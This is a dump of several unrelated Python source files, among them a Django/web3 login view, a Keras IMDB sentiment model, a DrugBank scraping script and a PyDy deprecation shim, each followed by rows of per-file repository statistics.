result_matrix.append(result_vector)
# import pdb; pdb.set_trace()
return result_matrix
def PrintFloatMatrix(matrix):
"""
Print a matrix composed of a list of list of floating point values.
@return no return value.
"""
index = 0
while index < len(matrix):
slice = matrix[index]
for block in slice:
# print '%6.8f' % block,
print '%6.3f' % block,
print
index += 1
def cleanup():
"""
Close all open files and any other cleanup required.
@return no return value
"""
fp_bbv.close()
if fp_simp:
fp_simp.close()
if fp_weight:
fp_weight.close()
############################################################################
options, fp_bbv, fp_simp, fp_weight = GetOptions()
if options.project_bbv:
result_matrix = ProjectFVFile(fp_bbv)
PrintFloatMatrix(result_matrix)
else:
GenRegionCSV(options, fp_bbv, fp_simp, fp_weight)
cleanup()
sys.exit(0)
| 33.809006 | 123 | 0.606715 | 2,926 | 21,773 | 4.407724 | 0.175325 | 0.007366 | 0.013026 | 0.016283 | 0.183066 | 0.136931 | 0.074746 | 0.059084 | 0.028224 | 0.022176 | 0 | 0.009848 | 0.286456 | 21,773 | 643 | 124 | 33.861586 | 0.820288 | 0.318514 | 0 | 0.225 | 0 | 0.007143 | 0.112127 | 0.016388 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.035714 | null | null | 0.010714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
803a46dade15dfe7d529009beb897901bfbdb1e7 | 2,918 | py | Python | pydy/codegen/code.py | jcrist/pydy | ec139f0dcbeffba8242636b727b3be02091792b0 | [
"BSD-3-Clause"
] | 1 | 2019-06-27T05:30:36.000Z | 2019-06-27T05:30:36.000Z | pydy/codegen/code.py | jcrist/pydy | ec139f0dcbeffba8242636b727b3be02091792b0 | [
"BSD-3-Clause"
] | null | null | null | pydy/codegen/code.py | jcrist/pydy | ec139f0dcbeffba8242636b727b3be02091792b0 | [
"BSD-3-Clause"
] | 1 | 2019-06-27T05:29:50.000Z | 2019-06-27T05:29:50.000Z | #!/usr/bin/env python
"""This module remains for backwards compatibility reasons and will be
removed in PyDy 0.4.0."""
import warnings
from .ode_function_generators import generate_ode_function as new_gen_ode_func
with warnings.catch_warnings():
warnings.simplefilter('once')
warnings.warn("This module, 'pydy.codgen.code', is deprecated. The "
"function 'generate_ode_function' can be found in the "
"'pydy.codegen.ode_function_generator' module. "
"'CythonGenerator' has been removed, use "
"'pydy.codegen.cython_code.CythonMatrixGenerator' "
"instead.",
DeprecationWarning)
class CythonGenerator(object):
def __init__(self, *args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter('once')
warnings.warn("'CythonGenerator' has been removed, use "
"'pydy.codegen.cython_code.CythonMatrixGenerator' "
"instead.", DeprecationWarning)
def generate_ode_function(mass_matrix, forcing_vector, constants,
coordinates, speeds, specified=None,
generator='lambdify'):
"""Returns a numerical function which can evaluate the right hand side
of the first order ordinary differential equations from a system
described by:
M(constants, coordinates) x' = F(constants, coordinates, speeds, specified)
Parameters
----------
mass_matrix : sympy.Matrix, shape(n,n)
The symbolic mass matrix of the system. The rows should correspond
to the coordinates and speeds.
forcing_vector : sympy.Matrix, shape(n,1)
The symbolic forcing vector of the system.
constants : list of sympy.Symbol
The constants in the equations of motion.
coordinates : list of sympy.Function
The generalized coordinates of the system.
speeds : list of sympy.Function
The generalized speeds of the system.
specified : list of sympy.Function
The specifed quantities of the system.
generator : string, {'lambdify'|'theano'|'cython'}, optional
The method used for generating the numeric right hand side.
Returns
-------
evaluate_ode_function : function
A function which evaluates the derivaties of the states.
"""
with warnings.catch_warnings():
warnings.simplefilter('once')
warnings.warn("This function is deprecated and will be removed in "
"PyDy 0.4.0. Use the the new 'generate_ode_function' "
"in 'pydy.codegen.ode_function_generator'",
DeprecationWarning)
return new_gen_ode_func(forcing_vector, coordinates, speeds, constants,
mass_matrix=mass_matrix, specifieds=specified,
generator=generator)
| 39.972603 | 79 | 0.643934 | 322 | 2,918 | 5.717391 | 0.363354 | 0.0478 | 0.029875 | 0.040739 | 0.319935 | 0.274307 | 0.238457 | 0.238457 | 0.238457 | 0.178164 | 0 | 0.003318 | 0.276902 | 2,918 | 72 | 80 | 40.527778 | 0.869194 | 0.391707 | 0 | 0.333333 | 1 | 0 | 0.305656 | 0.129964 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
803e4182cc11eec12d785bce525dec0268a1a586 | 749 | py | Python | sdk/identity/azure-identity/tests/test_imds_credential_async.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/identity/azure-identity/tests/test_imds_credential_async.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/identity/azure-identity/tests/test_imds_credential_async.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.identity.aio._credentials.managed_identity import ImdsCredential
import pytest
from helpers_async import AsyncMockTransport
@pytest.mark.asyncio
async def test_imds_close():
transport = AsyncMockTransport()
credential = ImdsCredential(transport=transport)
await credential.close()
assert transport.__aexit__.call_count == 1
@pytest.mark.asyncio
async def test_imds_context_manager():
transport = AsyncMockTransport()
credential = ImdsCredential(transport=transport)
async with credential:
pass
assert transport.__aexit__.call_count == 1
| 24.16129 | 75 | 0.691589 | 73 | 749 | 6.849315 | 0.534247 | 0.04 | 0.068 | 0.088 | 0.528 | 0.528 | 0.132 | 0 | 0 | 0 | 0 | 0.003125 | 0.145527 | 749 | 30 | 76 | 24.966667 | 0.778125 | 0.189586 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0 | false | 0.0625 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
803fc0980572bedb582462a274dae0d462a1eb72 | 241 | py | Python | sololearn/hovercraft.py | ehlodex/Python3 | 126c4662d1371ec6cbc1f257bd3de5c1dcdc86a6 | [
"MIT"
] | null | null | null | sololearn/hovercraft.py | ehlodex/Python3 | 126c4662d1371ec6cbc1f257bd3de5c1dcdc86a6 | [
"MIT"
] | null | null | null | sololearn/hovercraft.py | ehlodex/Python3 | 126c4662d1371ec6cbc1f257bd3de5c1dcdc86a6 | [
"MIT"
] | null | null | null | #!/usr/bin/env/ python3
"""SoloLearn > Code Coach > Hovercraft"""
sales = int(input('How many did you sell? ')) * 3
expense = 21
if sales > expense:
print('Profit')
elif sales < expense:
print('Loss')
else:
print('Broke Even')
| 18.538462 | 49 | 0.630705 | 33 | 241 | 4.606061 | 0.818182 | 0.157895 | 0.223684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020725 | 0.19917 | 241 | 12 | 50 | 20.083333 | 0.766839 | 0.240664 | 0 | 0 | 0 | 0 | 0.242938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8040774ec7da6d6e9a3a5ad4d793d25841c16e92 | 2,522 | py | Python | RSAMessengerDapp/User/views.py | slothmanxyz/RSAMessengerDapp | 3c5966196cac7749ea87ce0f42c47d159eb2ad14 | [
"MIT"
] | null | null | null | RSAMessengerDapp/User/views.py | slothmanxyz/RSAMessengerDapp | 3c5966196cac7749ea87ce0f42c47d159eb2ad14 | [
"MIT"
] | null | null | null | RSAMessengerDapp/User/views.py | slothmanxyz/RSAMessengerDapp | 3c5966196cac7749ea87ce0f42c47d159eb2ad14 | [
"MIT"
] | 1 | 2021-04-05T13:27:02.000Z | 2021-04-05T13:27:02.000Z | from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.forms import AuthenticationForm
from web3 import Web3
from .forms import SignupForm
from Key.models import Key
#The views and templates in this app are placeholders. Will use the ones in the Pages app instead later.
#Currently deployed to local hardhat network only
provider = Web3.HTTPProvider('http://127.0.0.1:8545/')
web3 = Web3(provider)
# Create your views here.
def home_view(request):
context={}
if not request.user.is_authenticated:
return render(request, 'User/home.html', context)
else:
return redirect('dashboard')
def dashboard_view(request):
context = {}
if not request.user.is_authenticated:
return redirect('home')
else:
context['username'] = request.user.username
context['address'] = request.user.address
context['balance'] = web3.fromWei(web3.eth.get_balance(request.user.address), 'ether')
context['keys'] = Key.objects.filter(user=request.user,is_main_key=True)
return render(request, 'User/dashboard.html', context)
def signup_view(request):
context = {}
if request.POST:
form = SignupForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password1')
user = authenticate(username=username,password=password)
login(request,user)
return redirect('home')
else:
context['signup_form'] = form
else:
form = SignupForm()
context['signup_form'] = form
return render(request, 'User/signup.html', context)
def login_view(request):
context = {}
if request.POST:
form = AuthenticationForm(request=request, data=request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username,password=password)
if user is not None:
login(request,user)
return redirect('home')
else:
context['login_form'] = form
else:
form = AuthenticationForm()
context['login_form'] = form
return render(request, 'User/login.html', context)
def logout_request(request):
logout(request)
return redirect('home') | 34.081081 | 104 | 0.657811 | 296 | 2,522 | 5.537162 | 0.290541 | 0.080537 | 0.043929 | 0.04881 | 0.377669 | 0.363636 | 0.23795 | 0.195241 | 0.140329 | 0.140329 | 0 | 0.009326 | 0.234734 | 2,522 | 74 | 105 | 34.081081 | 0.839896 | 0.069389 | 0 | 0.483871 | 0 | 0 | 0.092537 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.080645 | false | 0.064516 | 0.112903 | 0 | 0.33871 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8041201eb138a5c9f79a0273b50738c537af71ad | 398 | py | Python | app/__init__.py | Paulvitalis200/Store-Manager-API | d61e91bff7fc242da2a93d1caf1012465c7c904a | [
"MIT"
] | null | null | null | app/__init__.py | Paulvitalis200/Store-Manager-API | d61e91bff7fc242da2a93d1caf1012465c7c904a | [
"MIT"
] | 4 | 2018-10-21T18:28:03.000Z | 2018-10-24T12:48:24.000Z | app/__init__.py | Paulstar200/Store-Manager-API | d61e91bff7fc242da2a93d1caf1012465c7c904a | [
"MIT"
] | null | null | null | from flask import Flask, Blueprint
from flask_jwt_extended import JWTManager
def create_app(config):
app = Flask(__name__)
from instance.config import app_config
app.config.from_object(app_config[config])
app.config['JWT_SECRET_KEY'] = 'jwt-secret-string'
from .api.V1 import productsale_api as psa
app.register_blueprint(psa)
jwt = JWTManager(app)
return app
| 22.111111 | 54 | 0.738693 | 56 | 398 | 5 | 0.428571 | 0.160714 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003067 | 0.180905 | 398 | 17 | 55 | 23.411765 | 0.855828 | 0 | 0 | 0 | 0 | 0 | 0.077889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8044c8aa6dbc56f89bc318d636c18413c449c80a | 599 | py | Python | code/modern-python/quadratic.py | dushyantkhosla/testing4ds | e6f69f7ff46225a491da00ac994e036633d0ca64 | [
"MIT"
] | null | null | null | code/modern-python/quadratic.py | dushyantkhosla/testing4ds | e6f69f7ff46225a491da00ac994e036633d0ca64 | [
"MIT"
] | null | null | null | code/modern-python/quadratic.py | dushyantkhosla/testing4ds | e6f69f7ff46225a491da00ac994e036633d0ca64 | [
"MIT"
] | null | null | null | from math import sqrt
from typing import Tuple
def quadratic(a: float, b: float, c: float) -> Tuple[float, float]:
'''Compute roots of the quadratic equation:
a*x**2 + b*x + c = 0
For example:
>>> x1, x2 = quadratic(a=4, b=11, c=7)
>>> x1
-1.0
>>> x2
-1.75
>>> 4*x1**2 + 11*x1 + 7
0.0
>>> 4*x2**2 + 11*x2 + 7
0.0
'''
discriminant = sqrt(b**2.0 - 4.0*a*c)
x1 = (-b + discriminant) / (2.0 * a)
x2 = (-b - discriminant) / (2.0 * a)
return x1, x2
| 23.96 | 67 | 0.42571 | 89 | 599 | 2.865169 | 0.348315 | 0.023529 | 0.023529 | 0.117647 | 0.12549 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126404 | 0.405676 | 599 | 24 | 68 | 24.958333 | 0.589888 | 0.395659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
805364bb7db976a9ae2d3096d0339f8997426097 | 2,610 | py | Python | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | 3 | 2021-03-19T11:26:35.000Z | 2021-09-08T01:43:48.000Z | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | from keras.datasets import imdb
top_words = 10000
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=top_words)
#imdb.get_word_index()
word_dict = imdb.get_word_index()
word_dict = { key:(value + 3) for key, value in word_dict.items() }
word_dict[''] = 0 # Padding
word_dict['>'] = 1 # Start
word_dict['?'] = 2 # Unknown word
reverse_word_dict = { value:key for key, value in word_dict.items() }
print(' '.join(reverse_word_dict[id] for id in x_train[0]))
from keras.preprocessing import sequence
max_review_length = 500
x_train = sequence.pad_sequences(x_train, maxlen=max_review_length)
x_test = sequence.pad_sequences(x_test, maxlen=max_review_length)
from keras.models import Sequential
from keras.layers import Dense
from keras.layers.embeddings import Embedding
from keras.layers import Flatten
embedding_vector_length = 32
model = Sequential()
model.add(Embedding(top_words, embedding_vector_length, input_length=max_review_length))
model.add(Flatten())
model.add(Dense(16, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',optimizer='adam', metrics=['accuracy'])
print(model.summary())
hist = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=5, batch_size=128)
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
sns.set()
acc = hist.history['acc']
val = hist.history['val_acc']
epochs = range(1, len(acc) + 1)
plt.plot(epochs, acc, '-', label='Training accuracy')
plt.plot(epochs, val, ':', label='Validation accuracy')
plt.title('Training and Validation Accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend(loc='upper left')
plt.plot()
scores = model.evaluate(x_test, y_test, verbose=0)
print("Accuracy: %.2f%%" % (scores[1] * 100))
import string
import numpy as np
def analyze(text):
# Prepare the input by removing punctuation characters, converting
# characters to lower case, and removing words containing numbers
translator = str.maketrans('', '', string.punctuation)
text = text.translate(translator)
text = text.lower().split(' ')
text = [word for word in text if word.isalpha()]
# Generate an input tensor
input = [1]
for word in text:
if word in word_dict and word_dict[word] < top_words:
input.append(word_dict[word])
else:
input.append(2)
padded_input = sequence.pad_sequences([input], maxlen=max_review_length)
# Invoke the model and return the result
result = model.predict(np.array([padded_input][0]))[0][0]
return result | 33.461538 | 94 | 0.728736 | 387 | 2,610 | 4.751938 | 0.369509 | 0.052202 | 0.040783 | 0.016313 | 0.113649 | 0.113649 | 0.066884 | 0.038608 | 0.038608 | 0 | 0 | 0.016481 | 0.139847 | 2,610 | 78 | 95 | 33.461538 | 0.802673 | 0.092337 | 0 | 0.033333 | 0 | 0 | 0.07155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8058a85467ead4f2df3d7aeae90f5f3cb7569943 | 9,954 | py | Python | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 5 | 2017-03-31T03:25:09.000Z | 2021-12-17T02:28:24.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 165 | 2016-08-11T01:59:47.000Z | 2017-10-10T06:32:12.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 11 | 2015-06-15T04:25:59.000Z | 2021-04-18T09:39:16.000Z | # crawl_drugbank.py
import time
import pickle
import json
import MySQLdb
import httplib
import urllib2 as urllib
from collections import defaultdict
import dbcrawler_util as util
from datetime import datetime
from bs4 import BeautifulSoup as bs
outDir = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002'
db = MySQLdb.connect("localhost","root","123","ijah" )
cursor = db.cursor()
def main():
#########
# drugProteinDict = parseUniprotlinkFile() # contain drug-protein binding info
# drugbankIdList = drugProteinDict.keys()
# drugbankIdList = ['DB01627','DB05101','DB05107','DB08423','DB05127']
# drugData = parseDrugWebpage(drugbankIdList)
# drugData = parseSmiles(drugbankIdList)
# fixDrugData()
def fixDrugData():
badWords = ['email','class="wrap"','.smiles','href']
old = None
smilesDict = None
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.ori.pkl'
with open(fpath, 'rb') as handle:
old = pickle.load(handle)
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_smiles_2016-10-05_12:35:37.724557.pkl'
with open(fpath, 'rb') as handle:
smilesDict = pickle.load(handle)
nOld = len(old)
new = old
idx = 0
for k,v in old.iteritems():
idx += 1
print 'fixing', k, 'idx=', str(idx), 'of', nOld
if 'SMILES' in v.keys():
oldSmiles = v['SMILES']
bad = False
for b in badWords:
if b in oldSmiles:
bad = True
break
if bad:
new[k]['SMILES'] = smilesDict[k]
else:
new[k]['SMILES'] = smilesDict[k]
for k2,v2 in v.iteritems():
for b in badWords:
if b in v2:
new[k][k2] = 'not-available'
assert(len(old)==len(new))
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.pkl'
with open(fpath, 'wb') as f:
pickle.dump(new, f)
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.json'
with open(fpath, 'w') as f:
json.dump(new, f, indent=2, sort_keys=True)
def parseUniprotlinkFile():
dpFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/uniprot_links.csv'
now = datetime.now()
drugProteinDict = dict()
idx = 0
with open(dpFpath) as infile:
first = True
hot = ''
for line in infile:
if not(first):
idx += 1
print 'parsing idx=', idx
line = line.strip();
quoteIdx = [i for i,c in enumerate(line) if c=='"']; assert(len(quoteIdx)%2==0)
quoteIdx = [j for i,j in enumerate(quoteIdx) if i%2==0] # take only odd-indexed idx
words = line.split('"')
words2 = []
for w in words:
i = line.find(w) # just after an opening quote
w2 = w
if (i-1) in quoteIdx:
w2 = w.replace(',','$')
if len(w2)!=0:
words2.append(w2)
line = ' '.join(words2)
words = line.split(',');
words = words[0:4]
words = [w.strip() for w in words]
words = [w.replace('$',',') for w in words]
drugbankId = words[0]
name = words[1]
uniprotId = words[3]
if hot != drugbankId:
hot = drugbankId
drugProteinDict[hot] = defaultdict(list)
if len(drugProteinDict[hot]['name'])==0:
drugProteinDict[hot]['name'] = name
drugProteinDict[hot]['targetProtein'].append(uniprotId)
first = False
jsonFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(drugProteinDict, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(drugProteinDict, f)
return drugProteinDict
def parseDrugWebpage(drugbankIdList): # e.g. http://www.drugbank.ca/drugs/DB05107
html = None
comData = dict()
now = datetime.now()
nDbId = len(drugbankIdList)
for idx, dbId in enumerate(drugbankIdList):
print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
baseURL = 'http://www.drugbank.ca/drugs/'
url = baseURL+dbId
html = urllib.urlopen(url)
# baseFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/'
# fpath = baseFpath+dbId+ '.html'
# with open(fpath, 'r') as content_file:
# html = content_file.read()
#
soup = bs(html, 'html.parser')
#
datum = defaultdict(list)
# datum['name'] = str(soup.title.string).split()[1].strip()
trList = soup.find_all('tr')
for tr in trList:
trStr = str(tr)
keys = ['InChI Key','CAS number','Chemical Formula','SMILES']
for k in keys:
if (k in trStr)and('.smiles' not in trStr)and('class="wrap"' not in trStr)and('href' not in trStr):
trStr = trStr.split('<td>')[1].replace('</td></tr>','')
trStr = trStr.replace('InChIKey=','')
trStr = trStr.replace('<div class="wrap">','').replace('</div>','')
trStr = trStr.replace('<sub>','').replace('</sub>','')
if ('wishart-not-available' in trStr) or trStr=='':
trStr = 'not-available'
# print trStr
datum[k] = trStr
aList = soup.find_all('a')
cidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?cid='
sidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?sid='
chemspiderBaseUrl = 'http://www.chemspider.com/Chemical-Structure.'
uniprotBaseUrl = 'http://www.uniprot.org/uniprot/'
for a in aList:
href = str(a.get('href'))
if cidBaseUrl in href:
datum['pubchemCid']= str(a.get('href').strip(cidBaseUrl))
elif sidBaseUrl in href:
datum['pubchemSid']= str(a.get('href').strip(sidBaseUrl))
elif chemspiderBaseUrl in href:
datum['chemspiderId'] = str(a.get('href').strip(chemspiderBaseUrl).strip('.html'))
elif uniprotBaseUrl in href:
datum['uniprotTargets'].append( str(a.get('href').strip(uniprotBaseUrl)) )
comData[dbId] = datum
if ((idx+1)%100)==0 or idx==(nDbId-1):
jsonFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(comData, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(comData, f)
return comData
def parseSmiles(drugbankIdList):
now = datetime.now()
nDbId = len(drugbankIdList)
baseURL = 'http://www.drugbank.ca/structures/structures/small_molecule_drugs/'
smiles = dict()
for idx, dbId in enumerate(drugbankIdList):
print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
s = 'not-available'
url = baseURL+dbId+'.smiles'
try:
s = urllib.urlopen(url)
except urllib.HTTPError, e:
print('HTTPError = ' + str(e.code))
except urllib.URLError, e:
print('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
print('HTTPException')
except Exception:
import traceback
print('generic exception: ' + traceback.format_exc())
s = bs(s, 'html.parser')
smiles[dbId] = str(s)
if ((idx+1)%100)==0 or idx==(nDbId-1):
jsonFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(smiles, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(smiles, f)
# print smiles
return smiles
# def parseDrugbankVocab():
# fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_vocabulary.csv'
# with open(fpath) as infile:
# first = True
# idx = 0
# for line in infile:
# if not(first):
# idx += 1
# print 'updating idx=', idx
# line = line.strip()
# words = line.split(',')
# words = words[0:4]
# drugbankId = words[0]
# cas = words[3]
# cas = cas.replace('"','')
# if len(cas)!=0 and len(drugbankId)!=0:
# drugbankId = '"'+drugbankId+'"'
# cas = '"'+cas+'"'
# qf = 'UPDATE compound SET '
# qm = 'com_cas_id='+cas
# qr = ' WHERE com_drugbank_id='+drugbankId
# q = qf+qm+qr
# # print q
# util.mysqlCommit(db, cursor, q)
# first = False
if __name__ == '__main__':
start_time = time.time()
main()
print("--- %s seconds ---" % (time.time() - start_time))
| 35.55 | 140 | 0.544806 | 1,150 | 9,954 | 4.646957 | 0.228696 | 0.019461 | 0.022455 | 0.026946 | 0.378743 | 0.33271 | 0.315494 | 0.288922 | 0.288922 | 0.273578 | 0 | 0.034017 | 0.308921 | 9,954 | 279 | 141 | 35.677419 | 0.742841 | 0.166466 | 0 | 0.149171 | 0 | 0.027624 | 0.199248 | 0.093921 | 0 | 0 | 0 | 0 | 0.01105 | 0 | null | null | 0 | 0.060773 | null | null | 0.049724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8058ac0f97a55a2585c802f841a4705f0c870641 | 1,051 | py | Python | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | 1 | 2021-03-27T15:52:06.000Z | 2021-03-27T15:52:06.000Z | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# flake8: noqa
# -------------- Add path of _k2.so into sys.path --------------
import os as _os
import sys as _sys
_current_module = _sys.modules[__name__]
_k2_dir = _os.path.dirname(_current_module.__file__)
if not hasattr(_current_module, "__path__"):
__path__ = [_k2_dir]
elif _k2_dir not in __path__:
__path__.append(_k2_dir)
_sys.path.append(__path__)
# ---------------------- Absolute import ----------------------
from k2._k2host import IntArray2Size
from k2._k2host import FbWeightType
from k2 import python
# ---------------------- Setting __all__ ----------------------
# Add more symbols in this file's scope that with names not start with '_'.
__all__.extend(
[_s for _s in dir() if not _s.startswith("_") and _s not in __all__]
)
# Explicitly avoid importing the wild star, like "from k2 import *".
# This give a suggestion for users to follow the conventional usage --
# just import needed symbols:
# from k2 import Fsa
# from k2.fsa import Fsa
__all__.extend(["DO_NOT_WILD_IMPORT"])
